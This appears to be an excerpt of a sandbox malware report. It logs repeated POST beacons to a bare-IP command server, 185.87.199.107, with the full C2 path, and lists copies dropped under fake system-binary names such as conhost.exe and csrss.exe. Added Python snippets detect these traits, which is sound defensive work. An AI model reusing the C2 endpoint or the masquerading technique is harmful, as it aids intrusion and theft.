                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1060Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1064Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 185.87.199.107Content-Length: 1332Expect: 100-continueConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1064 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1064 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1064 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1064 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1060 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1332 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1064 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1064 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 1064 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 185.87.199.107 (this entry is listed 50 times in the report, one per connection)
Source: unknown | HTTP traffic detected: POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncPublicTemp.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 185.87.199.107 | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
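The POST requests above share one fingerprint: an opaque application/octet-stream body, a Host header that is a bare IPv4 address (which is why the report also lists dozens of TCP connections to 185.87.199.107 with no preceding DNS query), an Expect: 100-continue header, and a deep .php path assembled from database and web-server words glued to digits. The following Python is an added example, not part of the Joe Sandbox report, that parses one of those request heads (reconstructed here as a constructed sample from the lines above) and returns the reasons it looks like this beaconing. The benign control request, the keyword list and the scoring thresholds are assumptions for illustration; the Expect: 100-continue hint reflects the documented default of .NET's HttpWebRequest for POST bodies.

```python
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

# Constructed sample: one of the POST requests listed in the report above,
# with each header on its own line (the report runs them together).
SAMPLE_REQUEST = (
    "POST /Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/"
    "to_ServerAsyncPublicTemp.php HTTP/1.1\r\n"
    "Content-Type: application/octet-stream\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60\r\n"
    "Host: 185.87.199.107\r\n"
    "Content-Length: 1064\r\n"
    "Expect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed benign control (assumed): an ordinary form post to a hostname.
BENIGN_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 42\r\n"
    "\r\n"
)

# Path fragments that recur in the C2 URL seen in this report (assumed list).
PATH_WORDS = re.compile(r"(?i)(sql|wordpress|mariadb|async|temporary|public|central)")


@dataclass
class Request:
    method: str
    path: str
    headers: dict[str, str]  # header names lower-cased


def parse_request(raw: str) -> Request:
    """Split an HTTP/1.1 request head into method, path and a header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


def is_bare_ip(host: str) -> bool:
    """True when the Host header is a literal IPv4/IPv6 address, optionally with :port."""
    m = re.fullmatch(r"\[(?P<v6>[^\]]+)\](?::\d+)?|(?P<v4>[^:]+)(?::\d+)?", host.strip())
    if not m:
        return False
    try:
        ipaddress.ip_address(m.group("v6") or m.group("v4"))
    except ValueError:
        return False
    return True


def c2_url(req: Request) -> str:
    """Rebuild the URL form that also appears as a memory string later in the report."""
    return f"http://{req.headers.get('host', '')}{req.path}"


def score_beacon(req: Request) -> list[str]:
    """Return the reasons a request resembles the beaconing above (empty list = nothing odd)."""
    reasons: list[str] = []
    ctype = req.headers.get("content-type", "").lower()
    if req.method == "POST" and ctype.startswith("application/octet-stream"):
        reasons.append("POST with an opaque application/octet-stream body")
    host = req.headers.get("host", "")
    if is_bare_ip(host):
        reasons.append(f"Host is a literal IP ({host}), so no DNS lookup precedes the connection")
    if req.headers.get("expect", "").lower() == "100-continue":
        reasons.append("Expect: 100-continue, the default .NET HttpWebRequest behaviour for POST")
    segments = [s for s in req.path.split("/") if s]
    if req.path.lower().endswith(".php") and len(segments) >= 5:
        reasons.append(f"deep .php endpoint ({len(segments)} path segments)")
    if PATH_WORDS.search(req.path) and re.search(r"\d", req.path):
        reasons.append("path assembled from server/database words glued to digits")
    return reasons
```

Run against the sample all five traits fire and the control returns nothing; in a proxy or IDS context the useful threshold is two or more, since a bare-IP Host on its own is common for internal services.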
Source: conhost.exe, 00000027.00000002.3254317705.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000285E000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000276D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.87.199.107
Source: conhost.exe, 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.87.199.107/Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/
Source: conhost.exe, 00000027.00000002.3254317705.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000285E000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000276D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.87.199.107/Temporary/Sql6Js8/Wordpress3/7Sqlasync/8/PublicMariadb/central/to_ServerAsyncP
Source: conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.87.H
Source: KtMg6d1Ivx.exe, 00000000.00000002.2040685305.0000000003804000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: csrss.exe, 00000029.00000002.2473071988.0000000003037000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.w3.
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | File created: C:\Windows\ImmersiveControlPanel\pris\conhost.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSCB818CC877B7C4E7BA59872CD9B93F1.TMP
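The processes in this run are a textbook case of the "System File Execution Location Anomaly" pattern the report's Sigma signatures flag: a conhost.exe under C:\Windows\ImmersiveControlPanel\pris, a csrss.exe inside a Chrome version directory, a Registry.exe under the PowerShell schema directory (Registry is a process name on Windows, never an executable on disk), and a random-looking dZtDLPHWGnqMECrRIGtvnUL.exe dropped in two places. The Python below is an added example, not part of the report, that applies that reasoning to the executable paths listed in this report (embedded here as a constructed sample, with two legitimate system binaries as controls). The name table, the allowed-directory list and the randomness thresholds are assumptions modelled on the Sigma rule's idea, not copied from it; on a real host the same checks would be run over Sysmon event 1 or 11 image paths.

```python
from __future__ import annotations

import ntpath

# Constructed sample: executable paths taken from the process and dropped-file
# entries of this report, plus two legitimate system binaries as controls.
SAMPLE_PATHS = [
    r"C:\Users\user\Desktop\KtMg6d1Ivx.exe",
    r"C:\Windows\ImmersiveControlPanel\pris\conhost.exe",
    r"C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe",
    r"C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe",
    r"C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe",
    r"C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe",
    r"C:\Windows\System32\schtasks.exe",
    r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
]

# Assumed table: core Windows process images and the only directories where
# their genuine copies live (modelled on the Sigma location-anomaly rule).
SYSTEM_NAMES = {
    "conhost.exe", "csrss.exe", "smss.exe", "wininit.exe", "winlogon.exe",
    "services.exe", "lsass.exe", "svchost.exe", "dwm.exe", "taskhostw.exe",
}
ALLOWED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")

# Assumed: names that appear in the process list but never exist as an .exe on disk.
NO_DISK_IMAGE = {"registry.exe", "system.exe", "memory compression.exe"}


def looks_random(stem: str) -> bool:
    """Heuristic for generated names: long, vowel-poor, with many upper/lower flips."""
    if len(stem) < 12:
        return False
    vowel_ratio = sum(c in "aeiouAEIOU" for c in stem) / len(stem)
    case_flips = sum(
        1 for a, b in zip(stem, stem[1:])
        if a.isalpha() and b.isalpha() and a.isupper() != b.isupper()
    )
    return vowel_ratio < 0.25 and case_flips >= 6


def classify(path: str) -> list[str]:
    """Return the reasons a path is suspicious; an empty list means no finding."""
    lowered = path.lower()
    name = ntpath.basename(lowered)
    directory = ntpath.dirname(lowered)
    reasons: list[str] = []
    if name in SYSTEM_NAMES and not any(
        directory == d or directory.startswith(d + "\\") for d in ALLOWED_DIRS
    ):
        reasons.append(f"{name} outside System32/SysWOW64/WinSxS")
    if name in NO_DISK_IMAGE:
        reasons.append(f"{name} imitates a process that has no executable on disk")
    stem = ntpath.basename(path).rsplit(".", 1)[0]
    if looks_random(stem):
        reasons.append("random-looking file name")
    return reasons


def triage(paths: list[str]) -> dict[str, list[str]]:
    """Map each suspicious path to its findings; clean paths are left out."""
    return {p: findings for p in paths if (findings := classify(p))}
```

On the sample, exactly the five malware drop locations are returned and schtasks.exe, csc.exe and the original sample are not; name-based checks like these are cheap enough to run on every process-creation event, and a signature check (Authenticode) on anything flagged separates the rare legitimate hit from a copy like these.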
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Code function: 0_2_00007FF848F31300
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Code function: 0_2_00007FF8490EEEA8
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Code function: 0_2_00007FF8490EFFFA
Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Code function: 0_2_00007FF8490EFFF8
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 11_2_00007FF848F11300
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 12_2_00007FF848F76000
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 12_2_00007FF848F80B1C
Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 12_2_00007FF848F3FD62
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 29_2_00007FF848F76000
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 29_2_00007FF848F80B1C
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 30_2_00007FF848F56000
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 30_2_00007FF848F60B1C
Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Code function: 30_2_00007FF848F1FD62
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Code function: 31_2_00007FF848F21300
Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Code function: 32_2_00007FF848F01300
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 33_2_00007FF848F56000
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 33_2_00007FF848F60B1C
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 34_2_00007FF848F1FD62
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 34_2_00007FF848F56000
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 34_2_00007FF848F60B1C
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 35_2_00007FF848F3FD62
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 35_2_00007FF848F76000
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 35_2_00007FF848F80B1C
Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 36_2_00007FF848F56000
Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Code function: 36_2_00007FF848F60B1C
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 38_2_00007FF848F76000
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 38_2_00007FF848F80B1C
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 38_2_00007FF848F3FD62
Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Code function: 38_2_00007FF848F3FCA1
